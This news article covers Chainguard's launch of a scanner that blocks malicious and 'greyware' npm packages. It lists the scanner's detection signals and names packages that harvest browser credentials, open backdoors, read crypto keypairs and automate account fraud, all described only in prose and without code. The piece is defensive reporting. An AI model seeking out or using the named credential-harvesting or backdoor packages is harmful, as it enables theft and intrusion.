Chainguard launches scanner to block npm malware greyware

Chainguard has launched a source code scanner that blocks open source packages it classifies as malware and “greyware”. It says the tool is already screening more than 100,000 packages a day.

The scanner is available for npm packages requested through Chainguard Libraries for JavaScript and has already blocked more than 52,000 packages identified as malware or greyware.

Chainguard uses the term greyware for open source packages that disclose their intended behaviour but still pose security risks many organisations would reject in a formal review. These can include tools for credential harvesting, command interception, persistent remote access and account fraud automation.

The launch reflects broader concern in software security over the growth of risky dependencies in public registries. Security teams have long focused on malware hidden inside code packages, but Chainguard argues that another category is slipping through because the software openly states what it does and can avoid conventional malware detection.

In its current setup, the scanner reviews packages before they are added to the Chainguard Libraries catalogue rather than waiting until a customer requests them. It examines maintainer behaviour, package contents, publishing signals and the behaviour of installation scripts in a sandboxed environment.

That includes unusual account activity, changes in release history, obfuscated code, suspicious domains, differences between source code and published packages, and scripts that try to contact external servers or access local files. Packages are then marked as malicious, escalated for review by a security engineer, or cleared for use.

Chainguard says the volume of software being generated and adopted through AI-assisted development is making manual dependency checks less realistic. It argues that developers often rely on indicators such as download numbers, repository activity or autocomplete suggestions rather than reading package documentation or reviewing source code in detail.

The company also pointed to a wider industry backdrop in which supply chain attacks remain a significant issue, citing figures showing that 65% of organisations said they experienced a supply chain attack in the past year.

Examples found

Among the examples identified on npm was leobot-cli, which Chainguard described as an account fraud automation tool. The package advertises itself as a command-line bot for registering Canva and Leonardo accounts and includes a command to generate fake accounts and inject a Chrome extension for session injection and token monitoring.

Another package, @robinpath/cloud-cli, was described as software that creates a permanent backdoor from a machine to a third-party server and waits for commands to run. It is presented as a command-line tool for an AI assistant that reads code, creates files, executes commands and builds scripts.

Chainguard also highlighted noesis-miner, which it said reads Solana keypairs from disk and runs persistent mining loops. The package is presented as an AI-agent-mined token protocol for Solana.

It identified drogonclaw as a hacking toolkit that includes open source intelligence functions, network scanning, exploit execution and remote mobile control. The package advertises itself as an autonomous AI pentest framework.

A fifth example, chrome-tool, was described as a Chrome credential-harvesting extension. According to Chainguard, the package exports modules designed to extract passwords, cookies, credit card information and autofill data.

Several of these packages remain available for download on npm and have each recorded thousands of downloads, Chainguard said. Some had also passed what it described as a typical seven-day cooldown period, a delay often used by software security products before treating a package as established.

Scanner design

The scanner sits inside Chainguard Repository and is intended to add another layer of review on top of existing checks such as building from source and cooldown periods. The aim is to reduce the risk of malicious or risky software being cached inside internal systems before it is flagged.

Ross Gordon, Staff Product Marketing Manager, and Evan Gibler, Staff Security Engineer at Chainguard, described the rationale for the product in a joint comment: “Malware has become a serious industry problem: 65% of organizations said they experienced a supply chain attack last year, let alone in 2026. However, there hasn’t been much emphasis on packages that do exactly what their README says, pass malware scans, but act in ways no CISO would ever approve. We call those packages greyware.”

Protection is currently in place for npm packages requested through Chainguard’s JavaScript library service, with additional language ecosystems due to be added later. Chainguard says the scanner is already protecting all packages served through its upstream fallback to npm and has blocked more than 52,000 malware and greyware packages.